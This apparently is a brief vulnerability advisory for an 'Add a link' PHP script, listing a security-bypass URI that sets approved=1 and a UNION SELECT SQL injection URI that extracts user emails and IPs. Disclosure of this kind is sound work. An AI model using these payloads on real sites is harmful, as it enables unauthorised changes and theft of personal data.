|
Add a link Security Bypass and SQL Injection Vulnerabilities
Attackers can exploit the issues via a browser. The following exploit and example URIs are available: http://www.example.com/add_link.php?url=http://www.example2.com&linkname=name_of_the_link &approved=1&email=my@email.com&description=blablablablablablabla&category_id=1 http://www.example.com/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/* |
|
|
Privacy Statement |